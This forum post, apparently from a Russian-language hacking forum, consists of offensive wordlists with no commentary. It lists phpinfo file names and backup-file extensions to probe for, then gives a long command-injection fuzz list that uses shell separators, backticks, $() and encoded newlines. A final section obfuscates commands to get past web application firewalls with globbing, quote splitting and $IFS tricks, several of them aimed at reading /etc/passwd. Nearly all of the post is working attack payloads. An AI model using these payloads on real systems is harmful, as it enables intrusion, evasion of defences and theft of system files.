Phpinfo files
-----------------
.SpoilerTarget" type="button">Spoiler: Spoiler
Код:
Code:
phpinfo.php
php.php
php.ini
temp.php
test.php
info.php
phpphp.php
asd.php
asdf.php
123.php
test1.php
qqq.php
php.info.php
i.php
qwe.php
qwerty.php
q.php
z.php
a.php
aa.php
aaa.php
testphpinfo.php
testing.php
inf.php
_phpinfo.php
_php.php
_php.ini
_temp.php
_test.php
_info.php
_phpphp.php
_asd.php
_asdf.php
_123.php
_test1.php
_qqq.php
_php.info.php
_i.php
_qwe.php
_qwerty.php
_q.php
_z.php
_a.php
_aa.php
_aaa.php
phpinfo_.php
php_.php
php_.ini
temp_.php
test_.php
info_.php
phpphp_.php
asd_.php
asdf_.php
123_.php
test1_.php
qqq_.php
php.info_.php
i_.php
qwe_.php
qwerty_.php
q_.php
z_.php
a_.php
aa_.php
aaa_.php
Backup files exstensions
-----------------
.SpoilerTarget" type="button">Spoiler: Spoiler
Код:
Code:
~
.txt
.bak
.old
.bck
.save
.sav
.copy
.orig
.back
.backup
.bkp
.bac
.0
.1
.2
.000
.001
.002
.gz
.copia
.saved
.tar
.gz
.tgz
.7z
.tar.gz
.tar.bz2
.bz2
.zip
.rar
_txt
_bak
_old
_bck
_save
_sav
_copy
_orig
_back
_backup
_bkp
_bac
_0
_1
_2
_000
_001
_002
_copia
_saved
BAK
OLD
BCK
SAVE
SAV
COPY
ORIG
BACK
BACKUP
BKP
BAC
TXT
0
1
2
000
001
002
COPIA
SAVED
Default RCE fuzzdb
-----------------
.SpoilerTarget" type="button">Spoiler: Spoiler
Код:
Code:
/usr/bin/id
/bin/uname
uname
sleep 100
ping your_ip
/bin/sleep 100
/bin/ping your_ip
&/usr/bin/id
&/bin/uname
&uname
&sleep 100
&ping your_ip
&/bin/sleep 100
&/bin/ping your_ip
&&/usr/bin/id
&&/bin/uname
&&uname
&&sleep 100
&&ping your_ip
&&/bin/sleep 100
&&/bin/ping your_ip
|/usr/bin/id
|/bin/uname
|uname
|sleep 100
|ping your_ip
|/bin/sleep 100
|/bin/ping your_ip
||/usr/bin/id
||/bin/uname
||uname
||sleep 100
||ping your_ip
||/bin/sleep 100
||/bin/ping your_ip
;/usr/bin/id
;/bin/uname
;uname
;sleep 100
;ping your_ip
;/bin/sleep 100
;/bin/ping your_ip
%0a /usr/bin/id
%0a /bin/uname
%0a uname
%0a sleep 100
%0a ping your_ip
%0a/bin/sleep 100
%0a/bin/ping your_ip
%0a%0d /usr/bin/id
%0a%0d /bin/uname
%0a%0d uname
%0a%0d sleep 100
%0a%0d ping your_ip
%0a%0d/bin/sleep 100
%0a%0d/bin/ping your_ip
`/usr/bin/id`
`/bin/uname`
`uname`
`sleep 100`
`ping your_ip`
`/bin/sleep 100`
`/bin/ping your_ip`
$(/usr/bin/id)
$(/bin/uname)
$(uname)
$(sleep 100)
$(ping your_ip)
$(/bin/sleep 100)
$(/bin/ping your_ip)
'/usr/bin/id
'/bin/uname
'uname
'sleep 100
'ping your_ip
'/bin/sleep 100
'/bin/ping your_ip
'&/usr/bin/id
'&/bin/uname
'&uname
'&sleep 100
'&ping your_ip
'&/bin/sleep 100
'&/bin/ping your_ip
'&&/usr/bin/id
'&&/bin/uname
'&&uname
'&&sleep 100
'&&ping your_ip
'&&/bin/sleep 100
'&&/bin/ping your_ip
'|/usr/bin/id
'|/bin/uname
'|uname
'|sleep 100
'|ping your_ip
'|/bin/sleep 100
'|/bin/ping your_ip
'||/usr/bin/id
'||/bin/uname
'||uname
'||sleep 100
'||ping your_ip
'||/bin/sleep 100
'||/bin/ping your_ip
';/usr/bin/id
';/bin/uname
';uname
';sleep 100
';ping your_ip
';/bin/sleep 100
';/bin/ping your_ip
'%0a /usr/bin/id
'%0a /bin/uname
'%0a uname
'%0a sleep 100
'%0a ping your_ip
'%0a/bin/sleep 100
'%0a/bin/ping your_ip
'%0a%0d /usr/bin/id
'%0a%0d /bin/uname
'%0a%0d uname
'%0a%0d sleep 100
'%0a%0d ping your_ip
'%0a%0d/bin/sleep 100
'%0a%0d/bin/ping your_ip
"/usr/bin/id
"/bin/uname
"uname
"sleep 100
"ping your_ip
"/bin/sleep 100
"/bin/ping your_ip
"&/usr/bin/id
"&/bin/uname
"&uname
"&sleep 100
"&ping your_ip
"&/bin/sleep 100
"&/bin/ping your_ip
"&&/usr/bin/id
"&&/bin/uname
"&&uname
"&&sleep 100
"&&ping your_ip
"&&/bin/sleep 100
"&&/bin/ping your_ip
"|/usr/bin/id
"|/bin/uname
"|uname
"|sleep 100
"|ping your_ip
"|/bin/sleep 100
"|/bin/ping your_ip
"||/usr/bin/id
"||/bin/uname
"||uname
"||sleep 100
"||ping your_ip
"||/bin/sleep 100
"||/bin/ping your_ip
";/usr/bin/id
";/bin/uname
";uname
";sleep 100
";ping your_ip
";/bin/sleep 100
";/bin/ping your_ip
"%0a /usr/bin/id
"%0a /bin/uname
"%0a uname
"%0a sleep 100
"%0a ping your_ip
"%0a/bin/sleep 100
"%0a/bin/ping your_ip
"%0a%0d /usr/bin/id
"%0a%0d /bin/uname
"%0a%0d uname
"%0a%0d sleep 100
"%0a%0d ping your_ip
"%0a%0d/bin/sleep 100
"%0a%0d/bin/ping your_ip
Default RCE waf bypass fuzz_db
-----------------
.SpoilerTarget" type="button">Spoiler: Spoiler
[CODE]
Code:
/usr/bin/id
/bin/uname
uname
sleep 100
ping your_ip
/bin/sleep 100
/bin/ping your_ip
/???/???/?d
/???/u???e
/???/s???p 100
/???/p??g your_ip
/???/s???p$IFS\100
/???/p??g$IFS\your_ip
/???/s???p${IFS}100
/???/p??g${IFS}your_ip
/b*/sl*p 100
/b*/p*g your_ip
/u*/b*/id
/b*/u*e
/b*/sl*p$IFS\100
/b*/sl*p${IFS}100
/b*/p*g$IFS\your_ip
/b*/p*g${IFS}your_ip
/u"s"r/b"i"n/"i"d
/"b"i"n"/"u"n"a"m"e"
u"n"a"m"e
s"l"e"e"p 100
p"i"n"g" your_ip
/"b"i"n"/"s"l"e"e"p" 100
/"b"i"n"/"p"i"n"g your_ip
/u's'r/b'i'n/'i'd
/'b'i'n'/'u'n'a'm'e'
u'n'a'm'e
s'l'e'e'p 100
p'i'n'g' your_ip
/'b'i'n'/'s'l'e'e'p' 100
/'b'i'n'/'p'i'n'g your_ip
/usr$d/bin$d/id$d
/bin$d/uname$d
uname$d
sleep$d 100
ping$d your_ip
/bin$d/sleep$d 100
/bin$d/ping$d your_ip
/\u\s\r/\b\i\n/\i\d
/\b\i\n/\u\n\a\m\e
\u\n\a\m\e
\s\l\e\e\p 100
\p\i\n\g your_ip
/\b\i\n/\s\l\e\e\p 100
/\b\i\n/\p\i\n\g your_ip
/\\u\\s\\r/\\b\\i\\n/\\i\\d
/\\b\\i\\n/\\u\\n\\a\\m\\e
\\u\\n\\a\\m\\e
\\s\\l\\e\\e\\p 100
\\p\\i\\n\\g your_ip
/\\b\\i\\n/\\s\\l\\e\\e\\p 100
/\\b\\i\\n/\\p\\i\\n\\g your_ip
/\u$d\s$d\r$d/\b$d\i$d\n$d/\i$d\d$d
/\b$d\i$d\n$d/\u$d\n$d\a$d\m$d\e$d
\u$d\n$d\a$d\m$d\e$d
\s$d\l$d\e$d\e$d\p$d 100
\p$d\i$d\n$d\g$d your_ip
/\b$d\i$d\n$d/\s$d\l$d\e$d\e$d\p$d 100
/\b$d\i$d\n$d/\p$d\i$d\n$d\g$d your_ip
/\\u$d\\s$d\\r$d/\\b$d\\i$d\\n$d/\\i$d\\d$d
/\\b$d\\i$d\\n$d/\\u$d\\n$d\\a$d\\m$d\\e$d
\\u$d\\n$d\\a$d\\m$d\\e$d
\\s$d\\l$d\\e$d\\e$d\\p$d 100
\\p$d\\i$d\\n$d\\g$d your_ip
/\\b$d\\i$d\\n$d/\\s$d\\l$d\\e$d\\e$d\\p$d 100
/\\b$d\\i$d\\n$d/\\p$d\\i$d\\n$d\\g$d your_ip
/u$d"s"$d"r"$d/b$d"i"$d"n"$d/id$d
/b$d"i"$d"n"$d/u$d"n"$d"a"$d"m"$d"e"$d
u$d"n"$d"a"$d"m"$d"e"$d
s$d"l"$d"e"$d"e"$d"p"$d 100
p$d"i"$d"n"$d"g"$d your_ip
/b$d"i"$d"n"$d/s$d"l"$d"e"$d"e"$d"p"$d 100
/b$d"i"$d"n"$d/p$d"i"$d"n"$d"g"$d your_ip
/u$d's'$d'r'$d/b$d'i'$d'n'$d/id$d
/b$d'i'$d'n'$d/u$d'n'$d'a'$d'm'$d'e'$d
u$d'n'$d'a'$d'm'$d'e'$d
s$d'l'$d'e'$d'e'$d'p'$d 100
p$d'i'$d'n'$d'g'$d your_ip
/b$d'i'$d'n'$d/s$d'l'$d'e'$d'e'$d'p'$d 100
/b$d'i'$d'n'$d/p$d'i'$d'n'$d'g'$d your_ip
cat<>/etc/passwd
cat/etc/hosts
cat/etc$d/passwd$d
cat$d/\e$d\t\c/\p$d\a\s$d\s\w\d
c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts
/b$d'i'n/c$d'a'$d't'<>/e$d't'$d'c'/h$d'o'$d's'ts
/b$d"i"n/c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts
c$d"a"$d"t"<>/e$d"t"$d"c"/h$d"o"$d"s"ts
/bin/cat/etc/passwd
c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat$d$IFS/etc$d/passwd$d
cat$d${IFS}/etc$d/passwd$d
/bin/cat$IFS/etc/passwd
/bin/cat${IFS}/etc/passwd
sleep${IFS}100
ping${IFS}your_ip
/bin/sleep${IFS}100
/bin/ping${IFS}your_ip
sleep$d${IFS}100$d
c\a$d\t$IFS/\e$d\t\c/\p$d\a\s$d\s\w\d
c\a$d\t${IFS}/\e$d\t\c/\p$d\a\s$d\s\w\d
c\\a$d\\t$IFS/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
c\\a$d\\t${IFS}/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts
/b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
/b$d'i'n/c$d'a'$d't'${IFS}/e$d't'$d'c'/h$d'o'$d's'ts
/b$d'i'n/c$d'a'$d't'$IFS/e$d't'$d'c'/h$d'o'$d's'ts
/b$d"i"n/c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts
c$d"a"$d"t"$IFS/e$d"t"$d"c"/h$d"o"$d"s"ts
sleep$IFS\100
ping$IFS\your_ip
/bin/sleep$IFS\100
/bin/ping$IFS\your_ip
sleep$d$IFS\100$d
ping$d$IFS\your_ip$d
/bin$d/sleep$d$IFS\100$d
/bin$d/ping$d$IFS\your_ip$d
sle$d'e'p$d$IFS\100$d
pi$d'n'g$d$IFS\your_ip$d
/b$d'i'n$d/sl$d'e'ep$d$IFS\100$d
\s\l\e\e\p$d$IFS\100$d
\p\i\n\g$d$IFS\your_ip$d
/\b\i\n$d/\s\l\e\e\p$d$IFS\100$d
/\b\i\n$d/\p\i\n\g$d$IFS\your_ip$d
sle$d"e"p$d$IFS\100$d
pi$d"n"g$d$IFS\your_ip$d
/b$d"i"n$d/sl$d"e"ep$d$IFS\100$d
\\s\\l\\e\\e\\p$d$IFS\\100$d
\\p\\i\\n\\g$d$IFS\\your_ip$d
/\\b\\i\\n$d/\\s\\l\\e\\e\\p$d$IFS\\100$d
/\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d
\s\l\e$d\e\p$d$IFS\100$d
\p\i$d\n\g$d$IFS\your_ip$d
/\b$d\i\n$d/sl$d\e\\p$d$IFS\100$d
\\s\\l\\e\\e\\p$d${IFS}\\100$d
\\p\\i\\n\\g$d${IFS}\\your_ip$d
/\\b\\i\\n$d/\\s\\l\\e\\e\\p$d${IFS}\\100$d
/\\b\\i\\n$d/\\p\\i\\n\\g$d$IFS\\your_ip$d
\\s\l\\e$d\\e\\p$d$IFS\\100$d
\\p\\i$d\\n\\g$d$IFS\\your_ip$d
/\\b$d\\i\\n$d/sl$d\\e\\p$d$IFS\\100$d
\s\l\e\e\p${d}${IFS}\100${d}
\p\i\n\g${d}${IFS}\your_ip${d}
/\b\i\n${d}/\s\l\e\e\p${d}${IFS}\100${d}
/\b\i\n$d/\p\i\n\g$d${IFS}\your_ip${d}
\\s\l\\e${d}\\e\\p${d}${IFS}\\100${d}
\\p\\i${d}\\n\\g${d}${IFS}\\your_ip${d}
/\\b${d}\\i\\n${d}/sl${d}\\e\\p${d}${IFS}\\100${d}
s"l"e"e"p${d}${IFS}100${d}
p"i"n"g"${d}${IFS}your_ip${d}
/"b"i"n"${d}/"s"l"e"e"p"${d}${IFS}100${d}
/"b"i"n"$d/"p"i"n"g${d}${IFS}your_ip${d}
\s\l\e${d}\e\p${d}${IFS}\100${d}
\p\i${d}\n\\g${d}${IFS}\your_ip${d}
/\b${d}\i\n${d}/sl${d}\e\p${d}${IFS}\100${d}
s'l'e'e'p${d}${IFS}100${d}
p'i'n'g'${d}${IFS}your_ip${d}
/'b'i'n'${d}/'s'l'e'e'p'${d}${IFS}100${d}
/'b'i'n'$d/'p'i'n'g${d}${IFS}your_ip${d}
s"l"e${d}"e"p${d}${IFS}100${d}
p"i"${d}"n"g${d}${IFS}your_ip${d}
/"b"${d}i"n"${d}/s"l"${d}"e"p${d}${IFS}100${d}
s'l'e${d}'e'p${d}${IFS}100${d}
p'i'${d}'n'g${d}${IFS}your_ip${d}
/'b'${d}i'n'${d}/s'l'${d}'e'p${d}${IFS}100${d}
/\\b\\i\\n/\\c\\a$d\\t<>/\\e$d\\t\\c/\\p$d\\a\\s$d\\s\\w\\d
/\b\i\n/\c\a$d\t<>/\e$d\t\c/\p$d\a\s$d\s\w\d
s'l'e${d}'e'p${d}${IFS}100${d}
cat${d}<>/etc${d}/passwd${d}
/bin$d/cat$d<>/etc$d/passwd$d
/bin${d}/cat${d}<>/etc${d}/passwd${d}
/b${d}in/c${d}at<>/e${d}tc/pas${d}swd
/bin$d/cat$d/et${d}c/pa${d}s${d}s${d}w${d}d
/b${d}in/ca${d}t$<>/et${d}c/pa${d}s${d}s${d}w${d}d
/b${d}in/ca${d}t$/et$2c/pa$2s$2s$2w$2d
ca$2t$/et$2c/pa$2s$2s$2w$2d
/b$2in/ca$2t$/et$*c/pa$*s$*s$*w$*d
ca$*t/et$*c/pa$*s$*s$*w$*d
/b$*in/ca$*t/et$@c/pa$@s$@s$@w$@d
ca$@t/et$@c/pa$@s$@s$@w$@d
/b$@in/ca$@t/et$!c/pa$@s$@s$@w$@d
ca$!t/et$!c/pa$!s$!s$!w$!d
/b$!in/ca$!t/e`ddd`tc/pa`ddd`ss`ddd`wd
c`ddd`at/e$(ddd)tc/pa$(ddd)ss$(ddd)wd
c$(ddd)at
Линейный вид
